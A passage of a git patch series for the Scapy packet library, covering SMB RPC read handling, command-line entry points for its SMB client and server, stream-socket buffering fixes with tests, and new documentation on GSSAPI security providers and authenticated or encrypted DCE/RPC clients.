self).send(data) else: # Use WriteRequest/ReadRequest pkt = SMB2_Write_Request( @@ -777,7 +788,18 @@ def send(self, x): ) if SMB2_Read_Response not in resp: raise ValueError("Failed reading ReadResponse ! %s" % resp.NTStatus) - super(SMB_RPC_SOCKET, self).send(resp.Data) + data = bytes(resp.Data) + # Handle BUFFER_OVERFLOW (big DCE/RPC response) + while resp.NTStatus == "STATUS_BUFFER_OVERFLOW": + # Retrieve DCE/RPC full size + resp = self.ins.sr1( + SMB2_Read_Request( + FileId=self.PipeFileId, + ), + verbose=0 + ) + data += resp.Data + super(SMB_RPC_SOCKET, self).send(data) def close(self): SMB_SOCKET.close(self) From a05013cf98b460ae07b51613332b8bcbecf804d5 Mon Sep 17 00:00:00 2001 From: Mattia Dal Ben Date: Thu, 7 Mar 2024 07:23:40 +0100 Subject: [PATCH 1232/1632] Fix neighsol timeout not actually used (#4310) --- scapy/layers/inet6.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 529ee3b2b44..77f9ae5ae08 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -117,7 +117,7 @@ def neighsol(addr, src, iface, timeout=1, chainCC=0): p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=sm) - res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, + res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0, chainCC=chainCC) return res From ce7596da9eb4f3474d4391ca9f499e825273c29f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 11 Mar 2024 13:07:02 +0100 Subject: [PATCH 1233/1632] Auto-Argparse for smb{client,server} (#4313) --- doc/scapy/layers/smb.rst | 30 +++++++++--- scapy/layers/smbclient.py | 29 +++++++----- scapy/layers/smbserver.py | 11 +++-- scapy/utils.py | 96 +++++++++++++++++++++++++++++++++++++++ 4 files changed, 145 insertions(+), 21 deletions(-) diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 66d0e1fdfc8..5beebfbb989 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -92,6 +92,15 @@ You might be wondering if you can pass the ``HashNT`` of the password of the use If you pay very close attention, you'll notice that in this case we aren't using the :class:`~scapy.layers.spnego.SPNEGOSSP` wrapper. You could have used ``ssp=SPNEGOSSP([t.ssp(1)])``. +.. note:: + + It is also possible to start the :class:`~scapy.layers.smbclient.smbclient` directly from the OS, using the following:: + + $ python3 -m scapy.layers.smbclient server1.domain.local Administrator@DOMAIN.LOCAL + + Use ``python3 -m scapy.layers.smbclient -h`` to see the list of available options. + + Programmatically ________________ @@ -201,17 +210,17 @@ It's also accessible as the ``ins`` attribute of a ``SMB_SOCKET``, or the ``sock SMB 2/3 server -------------- -Scapy provides a SMB 2/3 server Automaton: :class:`~scapy.layers.smbclient.SMB_Server` +Scapy provides a SMB 2/3 server Automaton: :class:`~scapy.layers.smbserver.SMB_Server` .. image:: ../graphics/smb/smb_server.png :align: center -Once again, Scapy provides high level :class:`~scapy.layers.smbclient.smbserver` class that allows to spawn a SMB server. +Once again, Scapy provides high level :class:`~scapy.layers.smbserver.smbserver` class that allows to spawn a SMB server. -High-Level :class:`~scapy.layers.smbclient.smbserver` +High-Level :class:`~scapy.layers.smbserver.smbserver` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -The :class:`~scapy.layers.smbclient.smbserver` class allows to spawn a SMB server serving a selection of shares. +The :class:`~scapy.layers.smbserver.smbserver` class allows to spawn a SMB server serving a selection of shares. A share is identified by a ``name`` and a ``path`` (+ an optional description called ``remark``). **Start a SMB server with NTLM auth for 2 users:** @@ -271,10 +280,19 @@ A share is identified by a ``name`` and a ``path`` (+ an optional description ca ), ) -Low-Level :class:`~scapy.layers.smbclient.SMB_Server` +.. note:: + + It is possible to start the :class:`~scapy.layers.smbserver.smbserver` (albeit only in unauthenticated mode) directly from the OS, using the following:: + + $ python3 -m scapy.layers.smbserver --port 12345 + + Use ``python3 -m scapy.layers.smbserver -h`` to see the list of available options. + + +Low-Level :class:`~scapy.layers.smbserver.SMB_Server` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -To change the functionality of the :class:`~scapy.layers.smbclient.SMB_Server`, you shall extend the server class (which is an automaton) and provide additional custom conditions (or overwrite existing ones). +To change the functionality of the :class:`~scapy.layers.smbserver.SMB_Server`, you shall extend the server class (which is an automaton) and provide additional custom conditions (or overwrite existing ones). .. code:: python diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 90e6c885557..681ab564ef0 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -450,7 +450,7 @@ def send_data(self, d): class SMB_SOCKET(SuperSocket): """ - High-level wrapper over SMB_Client.smblink that provides some basic SMB + Mid-level wrapper over SMB_Client.smblink that provides some basic SMB client functions, such as tree connect, directory query, etc. """ @@ -827,19 +827,19 @@ class smbclient(CLIUtil): def __init__( self, - target, - UPN=None, - password=None, + target: str, + UPN: str = None, + password: str = None, + guest: bool = False, + kerberos: bool = True, + kerberos_required: bool = False, + HashNt: str = None, + port: int = 445, + timeout: int = 2, + debug: int = 0, ssp=None, - guest=False, - kerberos=True, - kerberos_required=False, - HashNt=None, ST=None, KEY=None, - port=445, - timeout=2, - debug=0, cli=True, ): if cli: @@ -1196,7 +1196,7 @@ def _lfs_complete(self, arg, cond): eltpar, eltname = self._parsepath(arg, remote=False) eltpar = self.localpwd / eltpar return [ - self.normalize_path(eltpar / x) + str(x.relative_to(self.localpwd)) for x in eltpar.glob("*") if (x.name.lower().startswith(eltname.lower()) and cond(x)) ] @@ -1471,3 +1471,8 @@ def rm_complete(self, file): if self._require_share(silent=True): return [] return self._fs_complete(file) + + +if __name__ == "__main__": + from scapy.utils import AutoArgparse + AutoArgparse(smbclient) diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index 4c665de3af8..3e812f86829 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -1698,9 +1698,9 @@ class smbserver: def __init__( self, shares=None, - iface=None, - port=445, - verb=2, + iface: str = None, + port: int = 445, + verb: int = 2, # SMB arguments ssp=None, **kwargs, @@ -1744,3 +1744,8 @@ def close(self): if self.srv: self.srv.shutdown(socket.SHUT_RDWR) self.srv.close() + + +if __name__ == "__main__": + from scapy.utils import AutoArgparse + AutoArgparse(smbserver) diff --git a/scapy/utils.py b/scapy/utils.py index e34934f3f94..0286ed0e6b3 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -13,6 +13,7 @@ from itertools import zip_longest import array +import argparse import collections import decimal import difflib @@ -3544,6 +3545,101 @@ def loop(self, debug: int = 0) -> None: print("Output processor failed with error: %s" % ex) +def AutoArgparse(func: DecoratorCallable) -> None: + """ + Generate an Argparse call from a function, then call this function. + + Notes: + + - for the arguments to have a description, the sphinx docstring format + must be used. See + https://sphinx-rtd-tutorial.readthedocs.io/en/latest/docstrings.html + - the arguments must be typed in Python (we ignore Sphinx-specific types) + untyped arguments are ignored. + - only types that would be supported by argparse are supported. The others + are omitted. + """ + argsdoc = {} + if func.__doc__: + # Sphinx doc format parser + m = re.match( + r"((?:.|\n)*?)(\n\s*:(?:param|type|raises|return|rtype)(?:.|\n)*)", + func.__doc__.strip(), + ) + if not m: + desc = func.__doc__.strip() + else: + desc = m.group(1) + sphinxargs = re.findall( + r"\s*:(param|type|raises|return|rtype)\s*([^:]*):(.*)", + m.group(2), + ) + for argtype, argparam, argdesc in sphinxargs: + argparam = argparam.strip() + argdesc = argdesc.strip() + if argtype == "param": + if not argparam: + raise ValueError(":param: without a name !") + argsdoc[argparam] = argdesc + else: + desc = "" + # Now build the argparse.ArgumentParser + parser = argparse.ArgumentParser( + prog=func.__name__, + description=desc, + formatter_class=argparse.ArgumentDefaultsHelpFormatter, + ) + # Process the parameters + positional = [] + for param in inspect.signature(func).parameters.values(): + if not param.annotation: + continue + parname = param.name + paramkwargs = {} + if param.annotation is bool: + if param.default is True: + parname = "no-" + parname + paramkwargs["action"] = "store_false" + else: + paramkwargs["action"] = "store_true" + elif param.annotation in [str, int, float]: + paramkwargs["type"] = param.annotation + else: + continue + if param.default != inspect.Parameter.empty: + if param.kind == inspect.Parameter.POSITIONAL_ONLY: + positional.append(param.name) + paramkwargs["nargs"] = '?' + else: + parname = "--" + parname + paramkwargs["default"] = param.default + else: + positional.append(param.name) + if param.kind == inspect.Parameter.VAR_POSITIONAL: + paramkwargs["action"] = "append" + if param.name in argsdoc: + paramkwargs["help"] = argsdoc[param.name] + parser.add_argument(parname, **paramkwargs) # type: ignore + # Now parse the sys.argv parameters + params = vars(parser.parse_args()) + # Act as in interactive mode + conf.logLevel = 20 + from scapy.themes import DefaultTheme + conf.color_theme = DefaultTheme() + # And call the function + try: + func( + *[params.pop(x) for x in positional], + **{ + (k[3:] if k.startswith("no_") else k): v + for k, v in params.items() + } + ) + except AssertionError as ex: + print("ERROR: " + str(ex)) + parser.print_help() + + ####################### # PERIODIC SENDER # ####################### From 4e343bb6907be0c31467319c4329b67de406492d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 12 Mar 2024 09:43:26 +0100 Subject: [PATCH 1234/1632] Fix (SSL)StreamSocket handling of underflowed data. (#4315) Also remove a HTTP 'iptables' option which is terrible. --- scapy/layers/http.py | 14 +----------- scapy/supersocket.py | 51 +++++++++++++++++--------------------------- test/regression.uts | 38 +++++++++------------------------ 3 files changed, 30 insertions(+), 73 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index d1b90784980..fd7b3f40500 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -47,7 +47,6 @@ import struct import subprocess -from scapy.base_classes import Net from scapy.compat import plain_str, bytes_encode from scapy.config import conf @@ -694,7 +693,7 @@ def guess_payload_class(self, payload): def http_request(host, path="/", port=80, timeout=3, display=False, verbose=0, - raw=False, iptables=False, iface=None, + raw=False, iface=None, **headers): """Util to perform an HTTP request, using the TCP_client. @@ -706,9 +705,6 @@ def http_request(host, path="/", port=80, timeout=3, :param raw: opens a raw socket instead of going through the OS's TCP socket. Scapy will then use its own TCP client. Careful, the OS might cancel the TCP connection with RST. - :param iptables: when raw is enabled, this calls iptables to temporarily - prevent the OS from sending TCP RST to the host IP. - On Linux, you'll almost certainly need this. :param iface: interface to use. Changing this turns on "raw" :param headers: any additional headers passed to the request @@ -730,11 +726,6 @@ def http_request(host, path="/", port=80, timeout=3, if iface is not None: raw = True if raw: - # Use TCP_client on a raw socket - iptables_rule = "iptables -%c INPUT -s %s -p tcp --sport 80 -j DROP" - if iptables: - host = str(Net(host)) - assert os.system(iptables_rule % ('A', host)) == 0 sock = TCP_client.tcplink(HTTP, host, port, debug=verbose, iface=iface) else: @@ -751,9 +742,6 @@ def http_request(host, path="/", port=80, timeout=3, ) finally: sock.close() - if raw and iptables: - host = str(Net(host)) - assert os.system(iptables_rule % ('D', host)) == 0 if ans: if display: if Raw not in ans: diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 485d201cb58..9e3379f1ae8 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -27,7 +27,6 @@ from scapy.error import warning, log_runtime from scapy.interfaces import network_name from scapy.packet import Packet, NoPayload -import scapy.packet from scapy.plist import ( PacketList, SndRcvList, @@ -438,23 +437,22 @@ def __init__(self, self.rcvcls = streamcls(basecls or conf.raw_layer) self.metadata: Dict[str, Any] = {} self.streamsession: Dict[str, Any] = {} - self.MTU = MTU + self._buf = b"" super(StreamSocket, self).__init__(sock, basecls=basecls) def recv(self, x=None, **kwargs): # type: (Optional[int], Any) -> Optional[Packet] if x is None: - x = self.MTU + x = MTU # Block but in PEEK mode data = self.ins.recv(x, socket.MSG_PEEK) if data == b"": raise EOFError x = len(data) - pkt = self.rcvcls(data, self.metadata, self.streamsession) + pkt = self.rcvcls(self._buf + data, self.metadata, self.streamsession) if pkt is None: # Incomplete packet. - if len(data) == self.MTU: # Bigger than MTU. Increase - self.MTU *= 2 - return None + self._buf += self.ins.recv(x) + return self.recv(x) self.metadata.clear() # Strip any madding pad = pkt.getlayer(conf.padding_layer) @@ -471,9 +469,12 @@ def recv(self, x=None, **kwargs): class SSLStreamSocket(StreamSocket): desc = "similar usage than StreamSocket but specialized for handling SSL-wrapped sockets" # noqa: E501 + # Basically StreamSocket but we can't PEEK + def __init__(self, sock, basecls=None): # type: (socket.socket, Optional[Type[Packet]]) -> None - self._buf = b"" + from scapy.sessions import TCPSession + self.sess = TCPSession(app=True) super(SSLStreamSocket, self).__init__(sock, basecls) # 65535, the default value of x is the maximum length of a TLS record @@ -481,31 +482,17 @@ def recv(self, x=None, **kwargs): # type: (Optional[int], **Any) -> Optional[Packet] if x is None: x = MTU - pkt = None # type: Optional[Packet] - if self._buf != b"": - try: - pkt = self.basecls(self._buf, **kwargs) - except Exception: - # We assume that the exception is generated by a buffer underflow # noqa: E501 - pass - + # Block + data = self.ins.recv(x) + try: + pkt = self.sess.process(data, cls=self.basecls) # type: ignore + except struct.error: + # Buffer underflow + pkt = None + if data == b"" and not pkt: + raise EOFError if not pkt: - buf = self.ins.recv(x) - if len(buf) == 0: - raise socket.error((100, "Underlying stream socket tore down")) - self._buf += buf - - x = len(self._buf) - pkt = self.basecls(self._buf, **kwargs) - if pkt is not None: - pad = pkt.getlayer(conf.padding_layer) - - if pad is not None and pad.underlayer is not None: - del pad.underlayer.payload - while pad is not None and not isinstance(pad, scapy.packet.NoPayload): # noqa: E501 - x -= len(pad.load) - pad = pad.payload - self._buf = self._buf[x:] + return self.recv(x) return pkt diff --git a/test/regression.uts b/test/regression.uts index 1c3f0c34321..5b5737a570e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3663,7 +3663,7 @@ class MockSocket(object): self.l = [ b'\x00\x00\x00\x01', b'\x00\x00\x00\x02', b'\x00\x00\x00\x03' ] def recv(self, x): if len(self.l) == 0: - raise socket.error(100, 'EOF') + return b"" return self.l.pop(0) def fileno(self): return -1 @@ -3691,7 +3691,7 @@ assert p.data == 3 try: ss.recv() ret = False -except socket.error: +except EOFError: ret = True assert ret @@ -3705,7 +3705,7 @@ class MockSocket(object): self.l = [ b'\x00\x00\x00\x01\x00\x00\x00\x02', b'\x00\x00\x00\x03\x00\x00\x00\x04' ] def recv(self, x): if len(self.l) == 0: - raise socket.error(100, 'EOF') + return b"" return self.l.pop(0) def fileno(self): return -1 @@ -3735,7 +3735,7 @@ assert p.data == 4 try: ss.recv() ret = False -except socket.error: +except EOFError: ret = True assert ret @@ -3749,7 +3749,7 @@ class MockSocket(object): self.l = [ b'\x00\x00', b'\x00\x01', b'\x00\x00\x00', b'\x02', b'\x00\x00', b'\x00', b'\x03' ] def recv(self, x): if len(self.l) == 0: - raise socket.error(100, 'EOF') + return b"" return self.l.pop(0) def fileno(self): return -1 @@ -3768,40 +3768,22 @@ class TestPacket(Packet): s = MockSocket() ss = SSLStreamSocket(s, basecls=TestPacket) -try: - p = ss.recv() - ret = False -except: - ret = True - -assert ret p = ss.recv() assert p.data == 1 -try: - p = ss.recv() - ret = False -except: - ret = True -assert ret p = ss.recv() assert p.data == 2 -try: - p = ss.recv() - ret = False -except: - ret = True -assert ret +p = ss.recv() +assert p.data == 3 + try: - p = ss.recv() + ss.recv() ret = False -except: +except EOFError: ret = True assert ret -p = ss.recv() -assert p.data == 3 ############ From 58519e55cfd6af4bb80ed98cb671412a3385be24 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 14 Mar 2024 18:46:23 +0100 Subject: [PATCH 1235/1632] Windows SSPs: various improvements (#4314) - All SSPs: support PFC_SUPPORT_HEADER_SIGN for DCE/RPC - Refactor SSPs and DCE/RPC client/server to use req_flags in GSS_Init_sec_context - KerberosSSP: - support DCE_STYLE (for DCE/RPC) - add MIC/WRAP support - NTLMSSP: fix SeqNum when used with SPNEGO - Fix a bunch of SPNEGO edge cases - Many tests --- doc/scapy/layers/dcerpc.rst | 108 ++++- doc/scapy/layers/gssapi.rst | 117 +++++ doc/scapy/layers/ntlm.rst | 35 -- scapy/config.py | 9 + scapy/layers/dcerpc.py | 195 ++++++-- scapy/layers/gssapi.py | 116 ++++- scapy/layers/kerberos.py | 554 ++++++++++++++++++----- scapy/layers/ldap.py | 281 ++++++++++-- scapy/layers/msrpce/msdcom.py | 24 +- scapy/layers/msrpce/msnrpc.py | 101 +++-- scapy/layers/msrpce/rpcclient.py | 233 +++++++--- scapy/layers/msrpce/rpcserver.py | 22 +- scapy/layers/ntlm.py | 122 +++-- scapy/layers/smbclient.py | 2 +- scapy/layers/spnego.py | 261 +++++++---- scapy/libs/rfc3961.py | 3 +- scapy/utils.py | 12 + test/pcaps/dcerpc_privacy_krb.pcapng.gz | Bin 0 -> 6120 bytes test/pcaps/dcerpc_privacy_ntlm.pcapng.gz | Bin 0 -> 36763 bytes test/scapy/layers/dcerpc.uts | 64 ++- test/scapy/layers/kerberos.uts | 296 +++++++++++- test/scapy/layers/ldap.uts | 20 +- test/scapy/layers/msnrpc.uts | 138 ++++++ test/scapy/layers/ntlm.uts | 117 +++-- 24 files changed, 2319 insertions(+), 511 deletions(-) create mode 100644 doc/scapy/layers/gssapi.rst delete mode 100644 doc/scapy/layers/ntlm.rst create mode 100644 test/pcaps/dcerpc_privacy_krb.pcapng.gz create mode 100644 test/pcaps/dcerpc_privacy_ntlm.pcapng.gz diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index 19c8e05ecd0..a39825f7037 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -192,7 +192,63 @@ Here's an example sending a ``ServerAlive`` over the ``IObjectExporter`` interfa resp = client.sr1_req(req) resp.show() -Here's a different example, this time connecting over ``NCACN_NP`` to `[MS-SAMR] `_ to enumerate the domains a server is in: +Here's the same example, but this time asking for :const:`~scapy.layers.dcerpc.RPC_C_AUTHN_LEVEL.PKT_PRIVACY` (encryption) using ``NTLMSSP``: + +.. code-block:: python + + from scapy.layers.ntlm import * + from scapy.layers.dcerpc import * + from scapy.layers.msrpce.all import * + + ssp = NTLMSSP( + UPN="Administrator", + PASSWORD="Password1", + ) + client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + auth_level=DCE_C_AUTHN_LEVEL.PKT_PRIVACY, + ssp=ssp, + ndr64=False, + ) + client.connect("192.168.0.100") + client.bind(find_dcerpc_interface("IObjectExporter")) + + req = ServerAlive_Request(ndr64=False) + resp = client.sr1_req(req) + resp.show() + +Again, but this time using :const:`~scapy.layers.dcerpc.RPC_C_AUTHN_LEVEL.PKT_INTEGRITY` (signing) using ``SPNEGOSSP[KerberosSSP]``: + +.. code-block:: python + + from scapy.layers.kerberos import * + from scapy.layers.spnego import * + from scapy.layers.dcerpc import * + from scapy.layers.msrpce.all import * + + ssp = SPNEGOSSP( + [ + KerberosSSP( + UPN="Administrator@domain.local", + PASSWORD="Password1", + SPN="host/dc1", + ) + ] + ) + client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + auth_level=DCE_C_AUTHN_LEVEL.PKT_INTEGRITY, + ssp=ssp, + ndr64=False, + ) + client.connect("192.168.0.100") + client.bind(find_dcerpc_interface("IObjectExporter")) + + req = ServerAlive_Request(ndr64=False) + resp = client.sr1_req(req) + resp.show() + +Here's a different example, this time connecting over :const:`~scapy.layers.dcerpc.DCERPC_Transport.NCACN_NP` to `[MS-SAMR] `_ to enumerate the domains a server is in: .. code-block:: python @@ -200,12 +256,13 @@ Here's a different example, this time connecting over ``NCACN_NP`` to `[MS-SAMR] from scapy.layers.dcerpc import * from scapy.layers.msrpce.all import * + ssp = NTLMSSP( + UPN="User", + HASHNT=MD4le("Password"), + ) client = DCERPC_Client( DCERPC_Transport.NCACN_NP, - ssp=NTLMSSP( - UPN="User", - HASHNT=MD4le("Password"), - ), + ssp=ssp, ndr64=False, ) client.connect("192.168.0.100") @@ -238,7 +295,9 @@ Here's a different example, this time connecting over ``NCACN_NP`` to `[MS-SAMR] .. note:: As you can see, we used the :class:`~scapy.layers.ntlm.NTLMSSP` security provider in the above connection. -There's an extension of the ``DCERPC_Client``: the ``NetlogonClient`` which is unfinished because I can't seem to make ``NetrLogonGetCapabilities`` work, but worth mentioning because it implements its own ``NetlogonSSP``: +There are extensions to the :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` class: + +- the :class:`~scapy.layers.msrpce.msnrpc.NetlogonClient`, worth mentioning because it implements its own :class:`~scapy.layers.msrpce.msnrpc.NetlogonSSP`: .. code-block:: python @@ -254,6 +313,8 @@ There's an extension of the ``DCERPC_Client``: the ``NetlogonClient`` which is u client.negotiate_sessionkey(bytes.fromhex("77777777777777777777777777777777")) client.close() +- the :class:`~scapy.layers.msrpce.msdcom.DCOM_Client` (unfinished) + Server ------ @@ -335,6 +396,41 @@ To start an endpoint mapper (this should be a separate process from your RPC ser .. note:: Currently, a DCERPC_Server will let a client bind on all interfaces that Scapy has registered (imported). Supposedly though, you know which RPCs are going to be queried. +Passive sniffing +---------------- + +If you're doing passive sniffing of a DCE/RPC session, you can instruct Scapy to still use its DCE/RPC session in order to check the INTEGRITY and decrypt (if PRIVACY is used) the packets. + +.. code-block:: python + + from scapy.all import * + + # Bind DCE/RPC port + bind_bottom_up(TCP, DceRpc5, dport=12345) + bind_bottom_up(TCP, DceRpc5, dport=12345) + + # Enable passive DCE/RPC session + conf.dcerpc_session_enable = True + + # Define SSPs that can be used for decryption / verify + conf.winssps_passive = [ + SPNEGOSSP([ + NTLMSSP( + IDENTITIES={ + "User1": MD4le("Password1!"), + }, + ), + ]) + ] + + # Sniff + pkts = sniff(offline="dcerpc_exchange.pcapng", session=TCPSession) + pkts.show() + + +.. warning:: Only NTLM is currently fully supported. KerberosSSP is sadly not supported as of today, nor is NetlogonSSP. + + Define custom packets --------------------- diff --git a/doc/scapy/layers/gssapi.rst b/doc/scapy/layers/gssapi.rst new file mode 100644 index 00000000000..bfdd9154225 --- /dev/null +++ b/doc/scapy/layers/gssapi.rst @@ -0,0 +1,117 @@ +GSSAPI +====== + +Scapy provides access to various `Security Providers `_ following the GSSAPI model, but aiming at interacting with the Windows world. + +.. note:: + + The GSSAPI interfaces are based off the following documentations: + + - GSSAPI: `RFC4121 `_ / `RFC2743 `_ + - GSSAPI C bindings: `RFC2744 `_ + +Usage +----- + +The following SSPs are currently provided: + + - :class:`~scapy.layers.ntlm.NTLMSSP` + - :class:`~scapy.layers.kerberos.KerberosSSP` + - :class:`~scapy.layers.spnego.SPNEGOSSP` + - :class:`~scapy.layers.msrpce.msnrpc.NetlogonSSP` + +Basically those are classes that implement two functions, trying to micmic the RFCs: + +- :func:`~scapy.layers.gssapi.SSP.GSS_Init_sec_context`: called by the client, passing it a ``Context`` and optionally a token +- :func:`~scapy.layers.gssapi.SSP.GSS_Accept_sec_context`: called by the server, passing it a ``Context`` and optionally a token + +They both return the updated Context, a token to optionally send to the server/client and a GSSAPI status code. + +.. note:: + + You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class:`~scapy.layers.smbserver.SMB_Server`, :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` or :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server`. + Have a look at `SMB `_ and `DCE/RPC `_ to get examples on how to use it. + +Let's implement our own client that uses one of those SSPs. + +Client +~~~~~~ + +First let's create the SSP. We'll take :class:`~scapy.layers.ntlm.NTLMSSP` as an example but the others would work just as well. + +.. code:: python + + from scapy.layers.ntlm import * + clissp = NTLMSSP( + UPN="Administrator@domain.local", + PASSWORD="Password1!", + ) + +Let's get the first token (in this case, the ntlm negotiate): + +.. code:: python + + # We start with a context = None and a val (server answer) = None + sspcontext, token, status = clissp.GSS_Init_sec_context(None, None) + # sspcontext will be passed to subsequent calls and stores information + # regarding this NTLM session, token is the NTLM_NEGOTIATE and status + # the state of the SSP + assert status == GSS_S_CONTINUE_NEEDED + +Send this token to the server, or use it as required, and get back the server's token. +You can then pass that token as the second parameter of :func:`~scapy.layers.gssapi.SSP.GSS_Init_sec_context`. +To give an example, this is what is done in the LDAP client: + +.. code:: python + + # Do we have a token to send to the server? + while token: + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b""), + authentication=LDAP_Authentication_SaslCredentials( + mechanism=ASN1_STRING(b"SPNEGO"), + credentials=ASN1_STRING(bytes(token)), + ), + ) + ) + sspcontext, token, status = clissp.GSS_Init_sec_context( + self.sspcontext, GSSAPI_BLOB(resp.protocolOp.serverSaslCreds.val) + ) + +If you want to use :class:`~scapy.layers.spnego.SPEGOSSP`, you could wrap the SSP as so: + +.. code:: python + + from scapy.layers.ntlm import * + from scapy.layers.spnegossp import SPNEGOSSP + clissp = SPNEGOSSP( + [ + NTLMSSP( + UPN="Administrator@domain.local", + PASSWORD="Password1!", + ), + KerberosSSP( + UPN="Administrator@domain.local", + PASSWORD="Password1!", + SPN="host/dc1.domain.local", + ), + ] + ) + +You can override the GSS-API ``req_flags`` when calling :func:`~scapy.layers.gssapi.SSP.GSS_Init_sec_context`, using values from :class:`~scapy.layers.gssapi.GSS_C_FLAGS`: + +.. code:: python + + sspcontext, token, status = clissp.GSS_Init_sec_context(None, None, req_flags=( + GSS_C_FLAGS.GSS_C_EXTENDED_ERROR_FLAG | + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | + GSS_C_FLAGS.GSS_C_CONF_FLAG # Asking for CONFIDENTIALITY + )) + + +Server +~~~~~~ + +Implementing a server is very similar to a client but you'd use :func:`~scapy.layers.gssapi.SSP.GSS_Accept_sec_context` instead. +The client is properly authenticated when `status` is `GSS_S_COMPLETE`. diff --git a/doc/scapy/layers/ntlm.rst b/doc/scapy/layers/ntlm.rst deleted file mode 100644 index f7ac18483fd..00000000000 --- a/doc/scapy/layers/ntlm.rst +++ /dev/null @@ -1,35 +0,0 @@ -NTLM -==== - -Scapy provides dissection & build methods for NTLM and other Windows mechanisms. - -How NTLM works --------------- - -NTLM is a legacy method of authentication that uses a `challenge-response mechanism `_. -The goal is to: - -- verify the identity of the client -- negotiate a common session key between the client and server - -.. note:: - - We won't get in more details. You can read more in `this article from hackndo `_ to understand how NTLM works. - -NTLM in Scapy -------------- - -Scapy implements `Security Providers `_ trying to stay as close a what you would find in the Windows world. - -Basically those are classes that implement two functions: - -- ``GSS_Init_sec_context``: called by the client, passing it a ``Context`` and optionally a token -- ``GSS_Accept_sec_context``: called by the server, passing it a ``Context`` and optionally a token - -They both return the updated Context, a token to optionally send to the server/client and a GSSAPI status code. - -For NTLM, this is implemented in the :class:`~scapy.layers.ntlm.NTLMSSP`. -You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class:`~scapy.layers.smbserver.SMB_Server`, :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` or :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server`. -Have a look at `SMB `_ and `DCE/RPC `_ to get examples on how to use it. - -.. note:: Remember that you can wrap it in a :class:`~scapy.layers.spnego.SPNEGOSSP` diff --git a/scapy/config.py b/scapy/config.py index 5e25e89da20..bc8c8a1c6d8 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1103,6 +1103,15 @@ class Conf(ConfClass): ) #: Dictionary containing parsed NSS Keys tls_nss_keys: Dict[str, bytes] = None + #: When TCPSession is used, parse DCE/RPC sessions automatically. + #: This should be used for passive sniffing. + dcerpc_session_enable = False + #: Some implementations of DCE/RPC incorrectly use header signing + #: without properly negotiating it. This forces it on. + dcerpc_force_header_signing = False + #: Windows SSPs for sniffing. This is used with + #: dcerpc_session_enable + winssps_passive = [] def __getattribute__(self, attr): # type: (str) -> Any diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 41c39960228..dbab259e97e 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -93,12 +93,15 @@ from scapy.supersocket import StreamSocket from scapy.layers.kerberos import ( - KRB_GSS_Wrap_RFC1964, - KRB_GSS_Wrap, KRB_InnerToken, Kerberos, ) -from scapy.layers.gssapi import GSSAPI_BLOB, GSSAPI_BLOB_SIGNATURE, SSP +from scapy.layers.gssapi import ( + GSS_S_COMPLETE, + GSSAPI_BLOB_SIGNATURE, + GSSAPI_BLOB, + SSP, +) from scapy.layers.inet import TCP from scapy.contrib.rtps.common_types import ( @@ -454,7 +457,24 @@ class CommonAuthVerifier(Packet): Kerberos, length_from=lambda pkt: pkt.parent.auth_len, ), - lambda pkt: pkt.auth_type == 0x10, + lambda pkt: pkt.auth_type == 0x10 and pkt.parent and + # Bind/Alter + pkt.parent.ptype in [11, 12, 13, 14, 15, 16], + ), + ( + PacketLenField( + "auth_value", + KRB_InnerToken(), + KRB_InnerToken, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type == 0x10 + and pkt.parent + and ( + # Other + not pkt.parent + or pkt.parent.ptype not in [11, 12, 13, 14, 15, 16] + ), ), # NTLM ( @@ -520,18 +540,18 @@ class CommonAuthVerifier(Packet): ] def is_protected(self): - if self.auth_type == 0x09 and isinstance(self.auth_value, GSSAPI_BLOB): - return isinstance( - self.auth_value.innerToken, KRB_InnerToken - ) and isinstance( # noqa: E501 - self.auth_value.innerToken.root, - 